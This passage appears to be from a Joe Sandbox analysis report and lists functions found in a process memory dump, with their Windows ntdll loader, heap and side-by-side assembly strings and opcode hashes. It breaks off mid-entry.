                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                      • API String ID: 0-861424205
                      • Opcode ID: 324a2fc34d002b66213e2d6382cd2c21a04e40e42f3317bfee276c80a0ce3957
                      • Instruction ID: b56229ad1adb29513a23d60a7e253524e0c70a4a10fbc675dd691000ea439c95
                      • Opcode Fuzzy Hash: 324a2fc34d002b66213e2d6382cd2c21a04e40e42f3317bfee276c80a0ce3957
                      • Instruction Fuzzy Hash: 21313576B80215B7E7258A9DCC85F9AFA6CDBA4A40F054169FF04B7146D270AE00C7A1
                      Function 0176C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                      Download Yara Rule
                      Strings
                      • LdrpInitializeImportRedirection, xrefs: 017A8177, 017A81EB
                      • minkernel\ntdll\ldrredirect.c, xrefs: 017A8181, 017A81F5
                      • minkernel\ntdll\ldrinit.c, xrefs: 0176C6C3
                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 017A81E5
                      • LdrpInitializeProcess, xrefs: 0176C6C4
                      • Loading import redirection DLL: '%wZ', xrefs: 017A8170
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                      • API String ID: 0-475462383
                      • Opcode ID: d247db0c293dfefba4d86714e4952be876a67782141c11f7cfacb1085eb4a43d
                      • Instruction ID: 9e3f194c11cada4fe2155a87bba23375d60763d850e249dc390ee8db20600dc1
                      • Opcode Fuzzy Hash: d247db0c293dfefba4d86714e4952be876a67782141c11f7cfacb1085eb4a43d
                      • Instruction Fuzzy Hash: C23106B16443429FD325EF28D859E2AF7E4AF94B10F00055CFD815B299D660ED04CBA2
                      Function 0177096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 01772DF0: LdrInitializeThunk.NTDLL ref: 01772DFA
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BA3
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BB6
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D60
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D74
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                      • String ID:
                      • API String ID: 1404860816-0
                      • Opcode ID: 54e30a67be4bb3bf21625dc410c678ba191004ae45da9e2e5c8597e5ba0e8158
                      • Instruction ID: 294aec694b496bb388cb65d9927a39ad470499d1fe9ee1a2d8527e6ab75bad3b
                      • Opcode Fuzzy Hash: 54e30a67be4bb3bf21625dc410c678ba191004ae45da9e2e5c8597e5ba0e8158
                      • Instruction Fuzzy Hash: A6427C71900715DFDB21CF28C884BAAB7F4FF49304F1445AAEA89DB245E770AA84CF61
                      Function 0173A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                      • API String ID: 0-379654539
                      • Opcode ID: 9428beb9232e44f36038252b4cfa400e2493c3e7c943f4ffe5e0fe9c2600a709
                      • Instruction ID: 204b753e69195aad9da9ea3a1843ca08d0e71c61dc3572be8246aa6abc2507a0
                      • Opcode Fuzzy Hash: 9428beb9232e44f36038252b4cfa400e2493c3e7c943f4ffe5e0fe9c2600a709
                      • Instruction Fuzzy Hash: 8CC15674108382DFDB11DF58C045B6AFBE4AF95704F0489AAF9D6CB292E734CA49CB52
                      Function 01768402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                      Download Yara Rule
                      Strings
                      • @, xrefs: 01768591
                      • minkernel\ntdll\ldrinit.c, xrefs: 01768421
                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0176855E
                      • LdrpInitializeProcess, xrefs: 01768422
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-1918872054
                      • Opcode ID: 19d7fc730624691cca0b1c803f7521839232dd3e5fcd66e3cca29017b00c067e
                      • Instruction ID: 155a98c67026559d5ed83f444e3bd933b13a9dad264448ecedae1ef35d44da62
                      • Opcode Fuzzy Hash: 19d7fc730624691cca0b1c803f7521839232dd3e5fcd66e3cca29017b00c067e
                      • Instruction Fuzzy Hash: 089189B1508345AFDB22DF25CC44FBBFAECEB84744F80092EFA8496156E734D9048B62
                      Function 0176273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                      Download Yara Rule
                      Strings
                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017A22B6
                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017A21D9, 017A22B1
                      • SXS: %s() passed the empty activation context, xrefs: 017A21DE
                      • .Local, xrefs: 017628D8
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                      • API String ID: 0-1239276146
                      • Opcode ID: ca921221edd4ff7072300fc0381c1c1c925bc784735eba9d45f306bfab422e9e
                      • Instruction ID: 299935536e5a70445eaf632474a6d78ec26c5875d90e59543aa934c348074875
                      • Opcode Fuzzy Hash: ca921221edd4ff7072300fc0381c1c1c925bc784735eba9d45f306bfab422e9e
                      • Instruction Fuzzy Hash: 6FA1A03194422ADBDB65CF68CC88BA9F7B5BF98314F1541E9DD48A7292D7309E80CF90
                      Function 01764AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                      Download Yara Rule
                      Strings
                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 017A342A
                      • RtlDeactivateActivationContext, xrefs: 017A3425, 017A3432, 017A3451
                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017A3437
                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017A3456
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                      • API String ID: 0-1245972979
                      • Opcode ID: d318b21c381089decbdf8137aa1a8ff49b5529fb68daf47987c101f53f8f9ddf
                      • Instruction ID: a17cb9123b7041cec6de0c1789eec40e5e72f3faaab0ead6e59dc717738c260c
                      • Opcode Fuzzy Hash: d318b21c381089decbdf8137aa1a8ff49b5529fb68daf47987c101f53f8f9ddf
                      • Instruction Fuzzy Hash: 486111766007129BD726CF1CC885B3AF7E9FFC0B50F548669E95A9B245CB30E801CB91
                      Function 017364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                      Download Yara Rule
                      Strings
                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01791028
                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0179106B
                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017910AE
                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01790FE5
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                      • API String ID: 0-1468400865
                      • Opcode ID: 2d7cfb22c3b98c3a8776d061c68822ac8f53b0c144750329c149aeeca79b7474
                      • Instruction ID: edb1c165c01fbd6ee90b699cfc7afcae01eeb58de4fbdaa5f1c78e597994a378
                      • Opcode Fuzzy Hash: 2d7cfb22c3b98c3a8776d061c68822ac8f53b0c144750329c149aeeca79b7474
                      • Instruction Fuzzy Hash: DC71C4B1504305AFCB21DF18C888B9BBFA9EF94764F500468F9488B18BD734D689CBD2
                      Function 0175245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                      Download Yara Rule
                      Strings
                      • LdrpDynamicShimModule, xrefs: 0179A998
                      • minkernel\ntdll\ldrinit.c, xrefs: 0179A9A2
                      • apphelp.dll, xrefs: 01752462
                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0179A992
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-176724104
                      • Opcode ID: 177f8688152c4c147c3053fd9cb0319cf4f8c86dc9bb47e86fdebf6434bd2960
                      • Instruction ID: 16ebcf08774cd4105eff6bd1ddece48654c2b65bb82d6530acfa5d221b7b60e4
                      • Opcode Fuzzy Hash: 177f8688152c4c147c3053fd9cb0319cf4f8c86dc9bb47e86fdebf6434bd2960
                      • Instruction Fuzzy Hash: 09314871A00201EBDF329F5DE895A6AFBB5FB84710F254059ED00A724AD7B45A85CB80
                      Function 017429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                      Download Yara Rule
                      Strings
                      • HEAP: , xrefs: 01743264
                      • HEAP[%wZ]: , xrefs: 01743255
                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0174327D
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                      • API String ID: 0-617086771
                      • Opcode ID: 810492220d10d4c951e6205823cbbfa11fa4db71baba553591361c0bb0e1b965
                      • Instruction ID: 6923ae33e1ede5849c32b2db0d08caa43051991a760c7241c48573af34bf1d80
                      • Opcode Fuzzy Hash: 810492220d10d4c951e6205823cbbfa11fa4db71baba553591361c0bb0e1b965
                      • Instruction Fuzzy Hash: 7692AB71A046599FEB25CF68D444BAEFBF1FF48300F188099E899AB392D735A941CF50
                      Function 01740770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                      • API String ID: 0-4253913091
                      • Opcode ID: f659f2d92c7fe2eba12e1344e2041ed895e808295329b99cd68116e2ab0a8760
                      • Instruction ID: 1ccb5675b745a34f17a6e136f75a85057889f40830aa1b8ef4020fb23ab02a72
                      • Opcode Fuzzy Hash: f659f2d92c7fe2eba12e1344e2041ed895e808295329b99cd68116e2ab0a8760
                      • Instruction Fuzzy Hash: B8F1AB74600606DFEB26CF68D894BAAF7B5FF44300F1481A9E6169B385D734EA85CB90
                      Function 01756962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: $@
                      • API String ID: 0-1077428164
                      • Opcode ID: 25dd96d62d00ab14f7ab54a9bb3915110b0f5ee15d876b17cd9305144a30671f
                      • Instruction ID: 4d9c514500f4892de776b65b26614185211c2c5fb648b227c99c1b0d240e6473
                      • Opcode Fuzzy Hash: 25dd96d62d00ab14f7ab54a9bb3915110b0f5ee15d876b17cd9305144a30671f
                      • Instruction Fuzzy Hash: FDC290716083419FEB69CF28C881BABFBE5AF88754F44896DF989C7241D774D804CB92
                      Function 0172A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: FilterFullPath$UseFilter$\??\
                      • API String ID: 0-2779062949
                      • Opcode ID: c6309019dc4bc91819ab36907a0b8896bcfd38ac703f14d9d729cacdb54f6049
                      • Instruction ID: e71b6a7d1dc35cc9b37f9cb1bab4548466d5b1f42271a7477bb0eda6ab6b042a
                      • Opcode Fuzzy Hash: c6309019dc4bc91819ab36907a0b8896bcfd38ac703f14d9d729cacdb54f6049
                      • Instruction Fuzzy Hash: C4A14C719416299BDB32EF68CC88BEAF7B8EF44710F1041E9E909A7250D7359E85CF50
                      Function 01750BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                      Download Yara Rule
                      Strings
                      • Failed to allocated memory for shimmed module list, xrefs: 0179A10F
                      • LdrpCheckModule, xrefs: 0179A117
                      • minkernel\ntdll\ldrinit.c, xrefs: 0179A121
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-161242083
                      • Opcode ID: 8614991a2e9021f8b85734ac57ee03a7c85a8be278d3da93afe859754c071efb
                      • Instruction ID: e8b1b143c65c239a59f02888702f51d901c594050d76dbf95a22316b9314414c
                      • Opcode Fuzzy Hash: 8614991a2e9021f8b85734ac57ee03a7c85a8be278d3da93afe859754c071efb
                      • Instruction Fuzzy Hash: EA71CF70A002059FDF26DF68C994ABEF7F4FB44304F24846DE802AB255E774AE81CB50
                      Function 01740A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                      • API String ID: 0-1334570610
                      • Opcode ID: 977dd9ab6413690959300636ab0f160887afd38a048a1d478c1e366663be3cc1
                      • Instruction ID: 744dc45f388daacf0d277a42be35c4d34a5fe97463bc17b53d54159c02430775
                      • Opcode Fuzzy Hash: 977dd9ab6413690959300636ab0f160887afd38a048a1d478c1e366663be3cc1
                      • Instruction Fuzzy Hash: D961A070600301DFDB2ACF28D844BAAFBE1FF45708F14859AE5558B296D770E941CB95
                      Function 0176C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                      Download Yara Rule
                      Strings
                      • minkernel\ntdll\ldrinit.c, xrefs: 017A82E8
                      • LdrpInitializePerUserWindowsDirectory, xrefs: 017A82DE
                      • Failed to reallocate the system dirs string !, xrefs: 017A82D7
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-1783798831
                      • Opcode ID: f45d0d38ef0ce8d94c846ed36f50154b17e1c5357bbe27eac8af1646398a0d43
                      • Instruction ID: 9bc065b2b5ddb101738f7a952c9754e873f486d79a2f2ef14eb05ca012466e0d
                      • Opcode Fuzzy Hash: f45d0d38ef0ce8d94c846ed36f50154b17e1c5357bbe27eac8af1646398a0d43
                      • Instruction Fuzzy Hash: 9A41CF71544311ABC732EF68D848B5BF7E8FB48650F10892AFE98D3295E774D9008B92
                      Function 017EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                      Download Yara Rule
                      Strings
                      • PreferredUILanguages, xrefs: 017EC212
                      • @, xrefs: 017EC1F1
                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017EC1C5
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                      • API String ID: 0-2968386058
                      • Opcode ID: f835dea1fb29dc57a445baffedc2cb745d4218f39646524942e728d4a77b9afc
                      • Instruction ID: 263dfbdc5179beb234f91a6413b022abd1922a3084ef6f2bd4780b71e4ee4c10
                      • Opcode Fuzzy Hash: f835dea1fb29dc57a445baffedc2cb745d4218f39646524942e728d4a77b9afc
                      • Instruction Fuzzy Hash: B8418375E04219EBDF12DBD8C859FEEFBFCAB18704F10406AE609B7240D7749A448B50
                      Function 017C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                      • API String ID: 0-1373925480
                      • Opcode ID: 69b6a4366d48d164839c18b6c57761c54cbb0e1a117a98f942fe5f62735a545a
                      • Instruction ID: d36840e083c6461e3094238595bfba5fea09a5075e5e45e850d1c9455866b6ac
                      • Opcode Fuzzy Hash: 69b6a4366d48d164839c18b6c57761c54cbb0e1a117a98f942fe5f62735a545a
                      • Instruction Fuzzy Hash: 8241F372A042588BEB26DBE8CC58BADFBB9FFA5B40F14045DD942EB785D7748901CB10
                      Function 017B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                      Download Yara Rule
                      Strings
                      • LdrpCheckRedirection, xrefs: 017B488F
                      • minkernel\ntdll\ldrredirect.c, xrefs: 017B4899
                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017B4888
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                      • API String ID: 0-3154609507
                      • Opcode ID: ed8523b3eb5965d21915ca7301f414c978b5a7bb16c935a2039a8c329e906480
                      • Instruction ID: 1750b3ba3d392de61f200a0822b763ec551ed660ca01ce348e861a5bfebc43d7
                      • Opcode Fuzzy Hash: ed8523b3eb5965d21915ca7301f414c978b5a7bb16c935a2039a8c329e906480
                      • Instruction Fuzzy Hash: 5141A372A447519FCB22CE5DD8C0BA6FBE4AF49650F050669ED8BD7257D730E800CB91
                      Function 01740BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                      • API String ID: 0-2558761708
                      • Opcode ID: 8282ec6e78eb59f48dee1b7c5cdaee008811f73c95c14594984923604a60d39a
                      • Instruction ID: e004d0dc8d41594d81ff3cbb5ccb7500000ab659c04f16371dbf1532d31b9971
                      • Opcode Fuzzy Hash: 8282ec6e78eb59f48dee1b7c5cdaee008811f73c95c14594984923604a60d39a
                      • Instruction Fuzzy Hash: 11112170315122CFDB6ACB18D854FBAF3A4EF40615F18816AF606CB265DB30D845CB44
                      Function 017B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                      Download Yara Rule
                      Strings
                      • LdrpInitializationFailure, xrefs: 017B20FA
                      • Process initialization failed with status 0x%08lx, xrefs: 017B20F3
                      • minkernel\ntdll\ldrinit.c, xrefs: 017B2104
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-2986994758
                      • Opcode ID: fdfd8e136f198ee38b94825e1e836f228c2f413e4081b43eefc2d54013893ebf
                      • Instruction ID: e0167b30d4c7a33d60a326c9584e0af075d266b751c7b81b8d7e78d0a18cccf4
                      • Opcode Fuzzy Hash: fdfd8e136f198ee38b94825e1e836f228c2f413e4081b43eefc2d54013893ebf
                      • Instruction Fuzzy Hash: A0F0C87578130CAFEB34EA4CDC67FD9B768EB44B54F504069FA006B68AD6B0A600CA51
                      Function 017403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: #%u
                      • API String ID: 48624451-232158463
                      • Opcode ID: 61979af25224719be0c2e9361d7f52eeb5c59335c7049c48786d743ccac6cf5f
                      • Instruction ID: c8974549364d99d311369286c892d7ab98c58010af7e543bb307fd5768cc8548
                      • Opcode Fuzzy Hash: 61979af25224719be0c2e9361d7f52eeb5c59335c7049c48786d743ccac6cf5f
                      • Instruction Fuzzy Hash: EA714771A0014A9FDB01DFA8D994FAEBBF8BF08704F144065EA05E7255EB34EE45CBA0
                      Function 0173A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                      Download Yara Rule
                      Strings
                      • LdrResSearchResource Exit, xrefs: 0173AA25
                      • LdrResSearchResource Enter, xrefs: 0173AA13
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                      • API String ID: 0-4066393604
                      • Opcode ID: a3615412cb57829f73e13e8fa0d1c8fb2e4a5a3348af7602ee40fb89bb12ad1a
                      • Instruction ID: 664489243a321e02717a8daffab9262bda267ecc94eb917b5a51e49cafaef7b3
                      • Opcode Fuzzy Hash: a3615412cb57829f73e13e8fa0d1c8fb2e4a5a3348af7602ee40fb89bb12ad1a
                      • Instruction Fuzzy Hash: 06E1A271E00209AFEF26DFA8D985BAEFBBAFF94310F100469E941E7252D7349945CB50
                      Function 017FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: `$`
                      • API String ID: 0-197956300
                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                      • Instruction ID: 47a455d474e48fc495d3d3e464a42f52781150a3e6b3c7e5acf3cc0012cdff5b
                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                      • Instruction Fuzzy Hash: DCC1AC312043429BEB25CF28C845B6BFBE5AFD4318F184A2DF69A8B391D774D505CB92
                      Function 017AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: Legacy$UEFI
                      • API String ID: 2994545307-634100481
                      • Opcode ID: 4554f8df5c35cb563b68c577ed0ffc73b4b23f9ed15228f767e20941ee93d760
                      • Instruction ID: cc74388a43568bc3274a701ab56032ad523567ca544333135db1229e2a69f2f7
                      • Opcode Fuzzy Hash: 4554f8df5c35cb563b68c577ed0ffc73b4b23f9ed15228f767e20941ee93d760
                      • Instruction Fuzzy Hash: E0616C71E403099FDB15DFA8C880BADFBB5FB88700F94416DE649EB291DB31A940CB50
                      Function 017D43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: @$MUI
                      • API String ID: 0-17815947
                      • Opcode ID: 6e62c20c18bfe6788a6f69959ccca86f420b5c5da5e85db6eab7d574e6f2055b
                      • Instruction ID: 23551c9b215801fbeae07a0cb64ec8dda8d517525edec183ace09fc6dfbf1917
                      • Opcode Fuzzy Hash: 6e62c20c18bfe6788a6f69959ccca86f420b5c5da5e85db6eab7d574e6f2055b
                      • Instruction Fuzzy Hash: 82511671E0021DAEDF11DFA9CC84AEEFBB9EB44754F100529EA12A7691D7309A45CB60
                      Function 017304E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                      Download Yara Rule
                      Strings
                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0173063D
                      • kLsE, xrefs: 01730540
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
